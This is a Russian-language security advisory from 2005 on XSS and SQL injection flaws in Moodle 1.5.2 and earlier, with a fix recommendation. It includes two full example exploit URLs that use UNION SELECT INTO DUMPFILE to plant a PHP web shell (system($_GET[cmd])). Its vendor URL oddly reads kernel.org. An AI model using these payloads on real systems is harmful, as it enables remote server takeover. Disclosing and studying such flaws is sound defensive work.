Межсайтовый скриптинг и SQL-инъекция в Moodle

Дата публикации:
14.11.2005
Дата изменения:
14.11.2005
Всего просмотров:
2159
Опасность:
Средняя
Наличие исправления:
Инстуркции по устранению
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Moodle 1.2.x
Moodle 1.3.x
Moodle 1.4.x
Moodle 1.5.x
Уязвимые версии: Moodle 1.5.2 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость обнаружена при обработке входных данных в параметре “id” в сценариях "category.php" и "info.php" и в параметре "user" в сценарии "plot.php". Удаленный пользователь может с помощью специально сформированного запроса выполнит произвольные SQL команды в базе данных приложения. Для удачной эксплуатации уязвимости опция "magic_quotes_gpc" должна быть выключена.Пример:

http://[target]/[path]/course/category.php?id='%20UNION
%20SELECT%200,'<?php%20system($_GET[cmd]);%20
?>',0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/
moodle/shell.php'%20FROM%20mdl_course_categories/*

http://[target]/[path]/course/info.php?id='UNION%20SELECT
%200,0,0,0,'<?php%20system($_GET[cmd]);%20?>',0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20
DUMPFILE%20'../../www/moodle/shell.php'%20FROM%20mdl_course/*

2. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "jump" сценария "jumpto.php". Удаленный пользователь может выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: kernel.org

Решение: Установите последнюю версию (1.6dev) с сайта производителя.

Источник:

Ссылки: Moodle <=1.6dev blind SQL Injection / Remote commands/code execution / xss

или введите имя

CAPTCHA